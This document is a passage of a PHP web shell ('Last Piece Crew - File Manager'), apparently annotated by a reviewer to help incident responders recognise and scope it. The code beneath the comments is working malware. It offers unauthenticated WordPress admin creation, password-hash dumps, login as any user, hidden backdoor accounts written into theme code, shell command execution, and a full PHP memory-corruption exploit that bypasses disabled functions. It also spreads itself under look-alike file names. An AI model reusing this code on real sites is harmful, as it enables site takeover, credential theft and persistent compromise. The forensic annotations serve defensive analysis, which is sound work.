/*
 * NOTE(review): this listing is a PHP web shell, not application code. Its own page
 * title (after the closing tag at the end) reads "Last Piece Crew - File Manager".
 * The code is left unchanged; the comments describe what each part does so that
 * responders can recognise it and scope an incident. Nothing here should be deployed.
 *
 * Capabilities visible in this listing:
 *   - POST `c4t`         : WordPress user dump / password reset / admin creation /
 *                          login-as-user / hide-user, with no authentication check
 *   - POST `proc_action` : process listing and signal sending
 *   - POST `cmd`, `eclipse`, `use_bypass` : command execution, with a memory-corruption
 *                          fallback (class Pwn) used when exec-style functions are disabled
 *   - file manager actions (`lph`, `edit`, `chmod`, `rename`, `del`, uploads, `remote_upload`)
 *   - `mass_spread`      : writes attacker-supplied content under look-alike file names
 *   - `gsocket_action`, `cpanel_token`, `ftp_*`, `Summon` : remote-access tooling,
 *                          cPanel API tokens, FTP accounts, Adminer download
 *
 * Artifacts worth checking on a host where this file was found: appended hooks in the
 * active theme's functions.php, unexpected administrator accounts, reset passwords,
 * cPanel API tokens named "lp" + 8 hex characters, new or changed FTP accounts,
 * /tmp/deploy-all.sh, Adminer.php, and PHP files whose names differ from a neighbour
 * by a single substituted character.
 *
 * The first statements below are the tail of findWpLoad(); its signature is outside
 * this listing.
 */
8) return false;
    $dir = $dir ?: __DIR__;
    $wp_load = $dir . '/wp-load.php';
    if (file_exists($wp_load)) return $wp_load;
    // Recurse into the parent directory with an incremented depth counter.
    return findWpLoad(dirname($dir), $depth + 1);
}

// === WP AJAX HANDLER - Exact copy from reference script ===
// NOTE(review): the only gate is "POST request carrying a `c4t` field". No session,
// nonce or capability check precedes any of the actions below.
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['c4t'])) {
    $wp_load_path = findWpLoad();
    if (!$wp_load_path) {
        echo json_encode(['err' => 'wp-load.php not found']);
        exit;
    }
    // Bootstraps WordPress so the handler can call its user and theme APIs.
    require_once $wp_load_path;

    /**
     * Appends PHP hooks to the theme's functions.php (template directory first,
     * stylesheet directory as fallback) that hide $username from the admin users
     * screen, decrement the reported user count, block deletion of that user, and
     * remove the bulk "delete" action when that user is selected.
     *
     * Returns true when the file exists (whether or not anything was appended),
     * false when no functions.php was found.
     *
     * NOTE(review): persistent modification of theme code. The appended block
     * contains the text get_user_by('login', '<username>'), which is also what
     * isUserHidden() searches for.
     */
    function addUserProtection($username) {
        $functions_file = get_template_directory() . '/functions.php';
        if (!file_exists($functions_file)) {
            $functions_file = get_stylesheet_directory() . '/functions.php';
        }
        if (file_exists($functions_file)) {
            // The username is concatenated into PHP source text that is written to disk.
            $protection_code = ' add_action(\'pre_get_users\', function($query) { if (is_admin() && function_exists(\'get_current_screen\')) { $screen = get_current_screen(); if ($screen && $screen->base === \'users\') { $protected_user = get_user_by(\'login\', \''
                . $username .
                '\'); if ($protected_user) { $excluded = (array) $query->get(\'exclude\'); $excluded[] = $protected_user->ID; $query->set(\'exclude\', $excluded); } } } }); add_filter(\'wp_count_users\', function($counts) { $protected_user = get_user_by(\'login\', \''
                . $username .
                '\'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action(\'delete_user\', function($user_id) { $user = get_user_by(\'ID\', $user_id); if ($user && $user->user_login === \''
                . $username .
                '\') { wp_die( __(\'User '
                . $username .
                ' tidak dapat dihapus.\', \'textdomain\'), __(\'Error\', \'textdomain\'), array(\'response\' => 403) ); } }); add_filter(\'user_search_columns\', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by(\'login\', \''
                . $username .
                '\'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter(\'bulk_actions-users\', function($actions) { if (isset($_REQUEST[\'users\']) && is_array($_REQUEST[\'users\'])) { $protected_user = get_user_by(\'login\', \''
                . $username .
                '\'); if ($protected_user && in_array($protected_user->ID, $_REQUEST[\'users\'])) { unset($actions[\'delete\']); } } return $actions; }); ';
            $current_content = file_get_contents($functions_file);
            // Append only when the marker text for this username is not already present.
            if (strpos($current_content, "get_user_by('login', '{$username}')") === false) {
                file_put_contents($functions_file, $protection_code, FILE_APPEND | LOCK_EX);
                return true;
            } else {
                return true;
            }
        }
        return false;
    }

    /**
     * Removes the block written by addUserProtection() for $username from
     * functions.php using a non-greedy, dot-matches-newline regex that spans from
     * the pre_get_users hook to the end of the bulk_actions-users filter.
     * Returns true only when the file content actually changed.
     */
    function removeUserProtection($username) {
        $functions_file = get_template_directory() . '/functions.php';
        if (!file_exists($functions_file)) {
            $functions_file = get_stylesheet_directory() . '/functions.php';
        }
        if (file_exists($functions_file)) {
            $current_content = file_get_contents($functions_file);
            $pattern = '/add_action\(\'pre_get_users\'.*?get_user_by\(\'login\', \'' . preg_quote($username, '/') . '\'.*?add_filter\(\'bulk_actions-users\'.*?\}\);\s*/s';
            $new_content = preg_replace($pattern, '', $current_content);
            if ($new_content !== $current_content) {
                file_put_contents($functions_file, $new_content, LOCK_EX);
                return true;
            }
        }
        return false;
    }

    /**
     * Reports whether functions.php contains the marker text
     * get_user_by('login', '<username>') that addUserProtection() writes.
     */
    function isUserHidden($username) {
        $functions_file = get_template_directory() . '/functions.php';
        if (!file_exists($functions_file)) {
            $functions_file = get_stylesheet_directory() . '/functions.php';
        }
        if (file_exists($functions_file)) {
            $current_content = file_get_contents($functions_file);
            return strpos($current_content, "get_user_by('login', '{$username}')") !== false;
        }
        return false;
    }

    global $wpdb;

    // 'ulst': returns every row of the users table, including the user_pass hash column.
    // NOTE(review): if this endpoint was reachable, treat all password hashes as disclosed.
    if ($_POST['c4t'] == 'ulst') {
        $users = $wpdb->get_results("SELECT ID, user_login, user_email, user_pass, user_registered FROM {$wpdb->users}");
        foreach ($users as $user) {
            $user->is_hidden = isUserHidden($user->user_login);
        }
        echo json_encode($users);
        exit;
    }

    // 'rpsw': sets a generated 12-character password for user id `uix` and returns it
    // to the caller together with the login and e-mail.
    if ($_POST['c4t'] == 'rpsw') {
        $user_id = intval($_POST['uix']);
        $new_password = wp_generate_password(12, true, true);
        wp_set_password($new_password, $user_id);
        $user_data = get_userdata($user_id);
        echo json_encode([
            'l' => $user_data->user_login,
            'e' => $user_data->user_email,
            'n' => $new_password
        ]);
        exit;
    }

    // 'cadm': creates a user with the administrator role; optionally hides it via
    // addUserProtection(). The username is reduced to [a-zA-Z0-9_]; when `xem` is not a
    // valid address the e-mail becomes <username>@<Host header>.
    if ($_POST['c4t'] == 'cadm') {
        $username = preg_replace('/[^a-zA-Z0-9_]/', '', $_POST['xun']);
        $password = $_POST['xpw'];
        $email = filter_var($_POST['xem'], FILTER_VALIDATE_EMAIL) ? $_POST['xem'] : $username . '@' . $_SERVER['HTTP_HOST'];
        $hide_user = isset($_POST['hide_user']) ? true : false;
        if (username_exists($username)) {
            echo json_encode(['err' => 'user exists']);
            exit;
        }
        $user_id = wp_create_user($username, $password, $email);
        if ($user_id && !is_wp_error($user_id)) {
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            if ($hide_user) {
                addUserProtection($username);
            }
            echo json_encode([
                'ok' => 'created',
                'u' => $username,
                'p' => $password,
                'hide' => $hide_user
            ]);
        } else {
            echo json_encode(['err' => 'create failed']);
        }
        exit;
    }

    // 'alog': issues a persistent auth cookie for user id `uix` without knowing the
    // password and returns the admin URL.
    if ($_POST['c4t'] == 'alog') {
        $user_id = intval($_POST['uix']);
        wp_clear_auth_cookie();
        wp_set_current_user($user_id);
        wp_set_auth_cookie($user_id, true);
        echo json_encode(['url' => admin_url()]);
        exit;
    }

    // 'hide': applies addUserProtection() to an existing user id.
    if ($_POST['c4t'] == 'hide') {
        $user_id = intval($_POST['uix']);
        $user = get_user_by('ID', $user_id);
        if ($user) {
            $result = addUserProtection($user->user_login);
            echo json_encode([
                'ok' => 'hidden',
                'user' => $user->user_login,
                'success' => $result
            ]);
        } else {
            echo json_encode(['err' => 'user not found']);
        }
        exit;
    }

    // 'unhide': removes the hooks for an existing user id.
    if ($_POST['c4t'] == 'unhide') {
        $user_id = intval($_POST['uix']);
        $user = get_user_by('ID', $user_id);
        if ($user) {
            $result = removeUserProtection($user->user_login);
            echo json_encode([
                'ok' => 'unhidden',
                'user' => $user->user_login,
                'success' => $result
            ]);
        } else {
            echo json_encode(['err' => 'user not found']);
        }
        exit;
    }

    // 'del': deletes a user (after removing its hide hooks, if any). Refuses only when
    // the target id equals the current WordPress user's id.
    if ($_POST['c4t'] == 'del') {
        $user_id = intval($_POST['uix']);
        $user = get_user_by('ID', $user_id);
        if ($user) {
            $current_user = wp_get_current_user();
            if ($user_id == $current_user->ID) {
                echo json_encode(['err' => 'cannot_delete_self']);
                exit;
            }
            if (isUserHidden($user->user_login)) {
                removeUserProtection($user->user_login);
            }
            if (wp_delete_user($user_id)) {
                echo json_encode([
                    'ok' => 'deleted',
                    'user' => $user->user_login
                ]);
            } else {
                echo json_encode(['err' => 'delete_failed']);
            }
        } else {
            echo json_encode(['err' => 'user_not_found']);
        }
        exit;
    }
    exit;
}
// === END WP AJAX HANDLER ===

// No authentication required
session_start();

// NOTE(review): always returns true, so every "&& isAuthenticated()" guard below is a no-op.
function isAuthenticated()
{
    return true;
}

// === PROCESS AJAX HANDLER ===
if (isset($_POST['proc_action']) && isAuthenticated()) {
    header('Content-Type: application/json; charset=utf-8');
    $pAct = $_POST['proc_action'];

    if ($pAct === 'list') {
        // Get all visible processes
        $ps_out = shell_exec('ps auxww 2>/dev/null') ?: '';
        $lines = explode("\n", trim($ps_out));
        $header = array_shift($lines);
        $processes = [];
        foreach ($lines as $line) {
            $line = trim($line);
            if (empty($line)) continue;
            // Limit of 11 keeps the full command line (with its spaces) in the last column.
            $cols = preg_split('/\s+/', $line, 11);
            if (count($cols) >= 11) {
                $processes[] = [
                    'user' => $cols[0],
                    'pid' => $cols[1],
                    'cpu' => $cols[2],
                    'mem' => $cols[3],
                    'vsz' => $cols[4],
                    'rss' => $cols[5],
                    'tty' => $cols[6],
                    'stat' => $cols[7],
                    'start' => $cols[8],
                    'time' => $cols[9],
                    'command' => $cols[10],
                ];
            }
        }

        // Detect hidden processes by comparing /proc with ps output
        $ps_pids = array_column($processes, 'pid');
        $hidden = [];
        if (is_dir('/proc')) {
            $proc_dirs = @scandir('/proc');
            if ($proc_dirs) {
                foreach ($proc_dirs as $d) {
                    if (!is_numeric($d)) continue;
                    if (!in_array($d, $ps_pids)) {
                        // Hidden process found - try to get info
                        $cmdline = @file_get_contents("/proc/$d/cmdline");
                        $cmdline = $cmdline ? str_replace("\0", ' ', trim($cmdline)) : '[hidden]';
                        $status = @file_get_contents("/proc/$d/status");
                        $uid = '?';
                        if ($status && preg_match('/Uid:\s+(\d+)/', $status, $m)) {
                            $pw = @posix_getpwuid((int)$m[1]);
                            $uid = $pw ? $pw['name'] : $m[1];
                        }
                        $hidden[] = [
                            'pid' => $d,
                            'user' => $uid,
                            'command' => $cmdline ?: '[hidden]',
                        ];
                    }
                }
            }
        }

        // Detect recently started processes (started within last 5 minutes)
        $recent = [];
        $now = time();
        foreach ($processes as $p) {
            // Check /proc/<pid>/stat for start time
            $stat = @file_get_contents("/proc/{$p['pid']}/stat");
            if ($stat) {
                // NOTE(review): splitting on spaces assumes the process name field contains none.
                $parts = explode(' ', $stat);
                if (isset($parts[21])) {
                    $uptime_str = @file_get_contents('/proc/uptime');
                    if ($uptime_str) {
                        $uptime = (float)explode(' ', $uptime_str)[0];
                        $clk_tck = 100; // sysconf(_SC_CLK_TCK)
                        $start_sec = (float)$parts[21] / $clk_tck;
                        $boot_time = $now - $uptime;
                        $proc_start = $boot_time + $start_sec;
                        $age = $now - $proc_start;
                        if ($age >= 0 && $age <= 300) {
                            $p['age_seconds'] = (int)$age;
                            $recent[] = $p;
                        }
                    }
                }
            }
        }

        echo json_encode([
            'processes' => $processes,
            'hidden' => $hidden,
            'recent' => $recent,
            'total' => count($processes),
            'total_hidden' => count($hidden),
            'total_recent' => count($recent),
        ]);
        exit;
    }

    if ($pAct === 'kill') {
        $pid = intval($_POST['pid'] ?? 0);
        if ($pid > 0) {
            // NOTE(review): `signal` is taken from the request and placed in the shell
            // command string as-is; only `pid` is cast to an integer.
            $sig = $_POST['signal'] ?? '9';
            $out = shell_exec("kill -$sig $pid 2>&1");
            echo json_encode(['ok' => true, 'pid' => $pid, 'output' => trim($out ?? '')]);
        } else {
            echo json_encode(['err' => 'invalid pid']);
        }
        exit;
    }

    echo json_encode(['err' => 'unknown action']);
    exit;
}
// === END PROCESS HANDLER ===

// === FILE MANAGER STARTS DIRECTLY ===
@ob_clean();
@header("X-Accel-Buffering: no");
@header("Content-Encoding: none");

// === BYPASS ENGINE (PHP UAF) ===
// NOTE(review): Helper and Pwn implement an interpreter memory-corruption exploit whose
// stated purpose (see runCmd) is to run a command when exec-style functions are disabled.
// It is deliberately not annotated step by step. Two observations for defenders:
//   - the four integers checked in get_basic_funcs() look like Zend module API numbers
//     for PHP 7.3 through 8.1 (confirm against the PHP build in use);
//   - disable_functions is therefore not a containment boundary here; a patched PHP
//     runtime and OS-level confinement of the PHP worker are what limit this code.
class Helper { public $a, $b, $c; }

class Pwn {
    const LOGGING = false;
    const CHUNK_DATA_SIZE = 0x60;
    const CHUNK_SIZE = self::CHUNK_DATA_SIZE;
    const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;
    const HT_SIZE = 0x118;
    const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;

    // Runs the whole chain on construction; $cmd is the command string handed to the
    // hijacked closure call. Returns early when the length check on $this->abc fails.
    public function __construct($cmd) {
        for($i = 0; $i < 10; $i++) {
            $groom[] = self::alloc(self::STRING_SIZE);
            $groom[] = self::alloc(self::HT_STRING_SIZE);
        }
        $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
        $fill = self::alloc(self::STRING_SIZE);
        $this->abc = self::alloc(self::STRING_SIZE);
        $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
        $this->free($abc_addr);
        $this->helper = new Helper;
        if(strlen($this->abc) < 0x1337) return;
        $this->helper->a = "leet";
        $this->helper->b = function($x) {};
        $this->helper->c = 0xfeedface;
        $helper_handlers = $this->rel_read(0);
        $closure_addr = $this->rel_read(0x20);
        $closure_ce = $this->read($closure_addr + 0x10);
        $basic_funcs = $this->get_basic_funcs($closure_ce);
        $zif_system = $this->get_system($basic_funcs);
        $fake_closure_off = 0x70;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        $this->rel_write($fake_closure_off + 0x38, 1, 4);
        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->rel_write($fake_closure_off + $handler_offset, $zif_system);
        $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
        $this->rel_write(0x20, $fake_closure_addr);
        ($this->helper->b)($cmd);
        $this->rel_write(0x20, $closure_addr);
        unset($this->helper->b);
    }

    private function heap_leak() {
        $arr = [[], []];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1;
            $buf = str_repeat("\x00", self::HT_STRING_SIZE);
        });
        $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
        return $buf;
    }

    private function free($addr) {
        $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
        $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
        $arr = [[], []];
        set_error_handler(function() use (&$arr, &$buf, &$payload) {
            $arr = 1;
            $buf = str_repeat($payload, 1);
        });
        $arr[1] .= "x";
    }

    private function rel_read($offset) {
        return self::str2ptr($this->abc, $offset);
    }

    private function rel_write($offset, $value, $n = 8) {
        for ($i = 0; $i < $n; $i++) {
            $this->abc[$offset + $i] = chr($value & 0xff);
            $value >>= 8;
        }
    }

    private function read($addr, $n = 8) {
        $this->rel_write(0x10, $addr - 0x10);
        $value = strlen($this->helper->a);
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) return $this->read($addr + 8);
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    private function get_basic_funcs($addr) {
        while(true) {
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) return $this->read($addr + 0x28);
            }
        }
    }

    static function alloc($size) {
        return str_shuffle(str_repeat("A", $size));
    }

    static function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }
}

/**
 * Runs Pwn($cmd) under output buffering and returns the trimmed captured output,
 * or null when nothing was captured. Every Throwable is swallowed.
 */
function runBypass($cmd) {
    ob_start();
    try { new Pwn($cmd); } catch(\Throwable $e) {}
    $out = ob_get_clean();
    return (!empty(trim($out ?? ''))) ? trim($out) : null;
}

// === CORE FUNCTIONS ===

/**
 * Executes $cmd through `/bin/bash -l -c`, trying proc_open, exec, shell_exec and
 * popen in that order and using the first that yields a non-null result; falls back
 * to runBypass() when the result is null or blank.
 *
 * NOTE(review): on hosts with process auditing, bash children of the PHP worker are
 * the trace this function leaves.
 */
function runCmd($cmd) {
    $out = null;
    $user = get_current_user();
    $home = getenv('HOME') ?: ('/home/' . $user);
    $env = "HOME=$home USER=$user";
    $fullCmd = $env . ' /bin/bash -l -c ' . escapeshellarg($cmd) . ' 2>&1';
    if (function_exists('proc_open')) {
        $desc = [0 => ['pipe','r'], 1 => ['pipe','w'], 2 => ['pipe','w']];
        $envArr = ['HOME' => $home, 'USER' => $user, 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'];
        $proc = @proc_open('/bin/bash -l -c ' . escapeshellarg($cmd), $desc, $pipes, $home, $envArr);
        if (is_resource($proc)) {
            @fclose($pipes[0]);
            $out = @stream_get_contents($pipes[1]);
            $err = @stream_get_contents($pipes[2]);
            @fclose($pipes[1]);
            @fclose($pipes[2]);
            @proc_close($proc);
            // stderr is reported only when stdout was blank.
            if (empty(trim($out ?? '')) && !empty(trim($err ?? ''))) $out = $err;
        }
    }
    if ($out === null && function_exists('exec')) {
        @exec($fullCmd, $outArr, $ret);
        $out = implode("\n", $outArr);
    }
    if ($out === null && function_exists('shell_exec')) {
        $out = @shell_exec($fullCmd);
    }
    if ($out === null && function_exists('popen')) {
        $fp = @popen($fullCmd, 'r');
        if ($fp) {
            $out = @stream_get_contents($fp);
            @pclose($fp);
        }
    }
    // Fallback: UAF bypass when all exec functions are disabled
    if ($out === null || trim($out) === '') {
        $out = runBypass($cmd);
    }
    return $out;
}

// Runs the `uapi` command-line tool with the given argument string via runCmd().
function runUapi($args) {
    return runCmd('uapi ' . $args);
}

// Returns ['ok' => bool, 'raw' => string]; 'ok' is true when the output contains "status: 1".
function parseUapiStatus($raw) {
    if (empty($raw)) return ['ok' => false, 'raw' => ''];
    $ok = (bool)preg_match('/status:\s*1/', $raw);
    return ['ok' => $ok, 'raw' => $raw];
}

/**
 * Extracts FTP account records from uapi text output. Splits on lines holding only
 * "-" and pulls user/login/domain/homedir/diskquota/diskused per block; when that
 * finds nothing, falls back to matching the fields across the whole output and
 * pairing them up by position.
 */
function parseUapiFtpList($raw) {
    if (empty($raw)) return [];
    $accounts = [];
    $blocks = preg_split('/^\s*-\s*$/m', $raw);
    foreach ($blocks as $block) {
        $acct = [];
        if (preg_match('/\buser:\s*(.+)/i', $block, $m)) $acct['user'] = trim($m[1], " '\"\r\n");
        if (preg_match('/\blogin:\s*(.+)/i', $block, $m)) $acct['login'] = trim($m[1], " '\"\r\n");
        if (preg_match('/\bdomain:\s*(.+)/i', $block, $m)) $acct['domain'] = trim($m[1], " '\"\r\n");
        if (preg_match('/\bhomedir:\s*(.+)/i', $block, $m)) $acct['homedir'] = trim($m[1], " '\"\r\n");
        if (preg_match('/\bdiskquota:\s*(.+)/i', $block, $m)) $acct['quota'] = trim($m[1], " '\"\r\n");
        if (preg_match('/\bdiskused:\s*(.+)/i', $block, $m)) $acct['used'] = trim($m[1], " '\"\r\n");
        if (!empty($acct['user']) || !empty($acct['login'])) $accounts[] = $acct;
    }
    if (empty($accounts)) {
        preg_match_all('/(?:user|login):\s*[\'"]?(\S+)[\'"]?/i', $raw, $userMatches);
        preg_match_all('/domain:\s*[\'"]?(\S+)[\'"]?/i', $raw, $domainMatches);
        preg_match_all('/homedir:\s*[\'"]?(\S+)[\'"]?/i', $raw, $dirMatches);
        for ($i = 0; $i < count($userMatches[1]); $i++) {
            $accounts[] = [
                'user' => $userMatches[1][$i] ?? '',
                'login' => $userMatches[1][$i] ?? '',
                'domain' => $domainMatches[1][$i] ?? '',
                'homedir' => $dirMatches[1][$i] ?? '',
            ];
        }
    }
    return $accounts;
}

// Formats a byte count as "<value> <unit>" with two decimals, capping at TB.
function formatSize($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $i = 0;
    while ($size >= 1024 && $i < 4) {
        $size /= 1024;
        $i++;
    }
    return round($size, 2) . ' ' . $units[$i];
}

/**
 * When the path's mode (last four octal digits) is one of the listed read-only or
 * no-access modes, attempts chmod to 0755 (directory) or 0644 (file).
 * Returns true when the mode was on the list, whether or not chmod succeeded.
 *
 * NOTE(review): called from listing, upload, edit, delete and rename paths, so merely
 * browsing with this tool can change permissions; unexpected 0755/0644 mode changes
 * are a possible forensic trace.
 */
function fixPermission($path) {
    $perms = @fileperms($path);
    if ($perms === false) return false;
    $octal = substr(sprintf('%o', $perms), -4);
    $unwritable = ['0555','0444','0111','0000','0550','0440','0110','0554','0445','0511','0155','0144'];
    if (in_array($octal, $unwritable)) {
        if (is_dir($path)) {
            @chmod($path, 0755);
        } else {
            @chmod($path, 0644);
        }
        return true;
    }
    return false;
}

// Applies fixPermission() and then reports whether the path is readable.
function safeAccess($path) {
    fixPermission($path);
    return @is_readable($path);
}

/**
 * Lists a directory for the UI: name, type, formatted size, octal mode, a colour
 * hint and read/write flags per entry, folders first. Returns the string 'None'
 * when the directory cannot be read.
 */
function getFileDetails($path) {
    $folders = [];
    $files = [];
    try {
        if (!safeAccess($path)) return 'None';
        $items = @scandir($path);
        if (!is_array($items)) return 'None';
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            $itemPath = $path . '/' . $item;
            $perm = @fileperms($itemPath);
            $permStr = $perm !== false ? substr(sprintf('%o', $perm), -4) : '----';
            $size = '';
            if (!is_dir($itemPath)) {
                $s = @filesize($itemPath);
                $size = $s !== false ? formatSize($s) : '?';
            }
            $isWritable = @is_writable($itemPath);
            $isReadable = @is_readable($itemPath);
            $permColor = '#f85149';
            if ($isWritable && $isReadable) $permColor = '#3fb950';
            elseif ($isReadable) $permColor = '#e6edf3';
            $detail = [
                'name' => $item,
                'type' => is_dir($itemPath) ? 'Folder' : 'File',
                'size' => $size,
                'permission' => $permStr,
                'perm_color' => $permColor,
                'writable' => $isWritable,
                'readable' => $isReadable,
            ];
            if (is_dir($itemPath)) $folders[] = $detail;
            else $files[] = $detail;
        }
        return array_merge($folders, $files);
    } catch (Exception $e) {
        return 'None';
    }
}

/**
 * Runs $command from the current directory via runCmd(); when that yields nothing,
 * retries through runBypass() without the cd prefix. $command is appended to the
 * shell string unescaped (only the directory is escaped).
 */
function executeCommand($command) {
    $currentDirectory = getCurrentDirectory();
    $fullCmd = "cd " . escapeshellarg($currentDirectory) . " && " . $command;
    $out = runCmd($fullCmd);
    if ($out !== null && !empty(trim($out))) return trim($out);
    // Final fallback: direct bypass without cd
    $out = runBypass($command);
    if ($out !== null && !empty(trim($out))) return trim($out);
    return 'No output or command failed.';
}

// Returns the file's contents, or false on failure (errors suppressed).
function readFileContent($file) {
    return @file_get_contents($file);
}

// Writes $_POST['content'] to $file after loosening permissions on the file and its directory.
function saveFileContent($file) {
    if (isset($_POST['content'])) {
        fixPermission($file);
        fixPermission(dirname($file));
        return @file_put_contents($file, $_POST['content']) !== false;
    }
    return false;
}

// Moves the single uploaded file `file` into $targetDirectory under its basename.
// No extension or content check is applied.
function uploadFile($targetDirectory) {
    if (isset($_FILES['file'])) {
        fixPermission($targetDirectory);
        $targetFile = $targetDirectory . '/' . basename($_FILES['file']['name']);
        if ($_FILES['file']['size'] === 0) return 'Empty file.';
        if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) return 'File uploaded successfully.';
        return 'Error uploading file.';
    }
    return '';
}

// Same as uploadFile() for the multi-file field `files`; returns a success/failure tally.
function uploadMultipleFiles($targetDirectory) {
    if (!isset($_FILES['files'])) return 'No files selected.';
    fixPermission($targetDirectory);
    $success = 0;
    $fail = 0;
    for ($i = 0; $i < count($_FILES['files']['name']); $i++) {
        if ($_FILES['files']['error'][$i] === 0 && !empty($_FILES['files']['name'][$i])) {
            $target = $targetDirectory . '/' . basename($_FILES['files']['name'][$i]);
            if (move_uploaded_file($_FILES['files']['tmp_name'][$i], $target)) $success++;
            else $fail++;
        }
    }
    return "Uploaded: $success, Failed: $fail";
}

// Resolved path of the process's current working directory.
function getCurrentDirectory() {
    return realpath(getcwd());
}

// Deletes a file, or delegates to deleteFolder() for a directory; loosens permissions first.
function deleteFile($file) {
    fixPermission($file);
    fixPermission(dirname($file));
    if (file_exists($file)) {
        if (is_dir($file)) return deleteFolder($file);
        if (@unlink($file)) return true;
    }
    return false;
}

// Recursively deletes a directory tree, loosening permissions on each entry as it goes.
function deleteFolder($folder) {
    fixPermission($folder);
    if (is_dir($folder)) {
        $items = @scandir($folder);
        if (is_array($items)) {
            foreach ($items as $item) {
                if ($item == '.' || $item == '..') continue;
                $path = $folder . '/' . $item;
                fixPermission($path);
                if (is_dir($path)) deleteFolder($path);
                else @unlink($path);
            }
        }
        return @rmdir($folder);
    }
    return false;
}

// Renames $oldName to $newName within the same directory; $newName is used as given.
function renameFile($oldName, $newName) {
    fixPermission($oldName);
    fixPermission(dirname($oldName));
    if (file_exists($oldName)) {
        $directory = dirname($oldName);
        $newPath = $directory . '/' . $newName;
        if (@rename($oldName, $newPath)) return 'Renamed successfully.';
        return 'Error renaming.';
    }
    return 'File does not exist.';
}

// Returns the directories at the greatest nesting depth under $basePath.
function scanDeepestDirectory($basePath) {
    $deepest = [];
    $maxDepth = 0;
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        foreach ($iterator as $item) {
            if ($item->isDir()) {
                $depth = $iterator->getDepth();
                if ($depth > $maxDepth) {
                    $maxDepth = $depth;
                    $deepest = [$item->getPathname()];
                } elseif ($depth == $maxDepth) {
                    $deepest[] = $item->getPathname();
                }
            }
        }
    } catch (Exception $e) {}
    return $deepest;
}

// Returns up to $limit files with extension $ext under $basePath, newest mtime first.
function scanNewlyFiles($basePath, $ext = 'php', $limit = 50) {
    $files = [];
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS)
        );
        foreach ($iterator as $item) {
            if ($item->isFile() && strtolower($item->getExtension()) === $ext) {
                $files[] = ['path' => $item->getPathname(), 'time' => $item->getMTime()];
            }
        }
    } catch (Exception $e) {}
    usort($files, function($a, $b) { return $b['time'] - $a['time']; });
    return array_slice($files, 0, $limit);
}

/**
 * Produces file names that differ from $filename by one substituted character
 * (per the map below); when no character is substitutable, returns a dot-prefixed
 * name and a "_bak" name instead.
 *
 * NOTE(review): detection angle - in a directory, look for a PHP file whose name is
 * one substitution away from a legitimate neighbour, or ".<name>" / "<name>_bak.<ext>".
 */
function generateHomoglyph($filename) {
    $name = pathinfo($filename, PATHINFO_FILENAME);
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    $map = [
        'a' => ['@','4'], 'e' => ['3'], 'i' => ['1','l'], 'o' => ['0'],
        's' => ['5'], 'l' => ['1','I'], 'g' => ['9'], 'c' => ['('],
        't' => ['7'], 'I' => ['l','1'], 'O' => ['0'], 'S' => ['5'],
        'A' => ['4','@'], 'E' => ['3'], 'B' => ['8'], 'G' => ['6'], 'T' => ['7'],
    ];
    $variants = [];
    $len = strlen($name);
    for ($i = 0; $i < $len; $i++) {
        $ch = $name[$i];
        if (isset($map[$ch])) {
            foreach ($map[$ch] as $rep) {
                $v = substr($name, 0, $i) . $rep . substr($name, $i + 1);
                $full = $ext ? $v . '.' . $ext : $v;
                if ($full !== $filename) $variants[] = $full;
            }
        }
    }
    if (empty($variants)) {
        $variants[] = '.' . $filename;
        $variants[] = $name . '_bak.' . $ext;
    }
    return array_unique($variants);
}

/**
 * For $basePath and every directory beneath it, writes $content to one new file
 * named as a look-alike of an existing .php file there (or of index.php, config.php,
 * class-loader.php when the directory has none). Existing files are not overwritten.
 * Returns ['count', 'errors', 'created'].
 *
 * NOTE(review): removing only the original shell leaves these copies behind; scope
 * cleanup by content (hash or string match) across the whole tree, not by file name.
 */
function massSpreadAuto($basePath, $content) {
    $count = 0;
    $errors = [];
    $created = [];
    $targetExts = ['php'];
    try {
        fixPermission($basePath);
        $dirs = [$basePath];
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        foreach ($iterator as $item) {
            if ($item->isDir()) $dirs[] = $item->getPathname();
        }
        foreach ($dirs as $dir) {
            fixPermission($dir);
            $files = @scandir($dir);
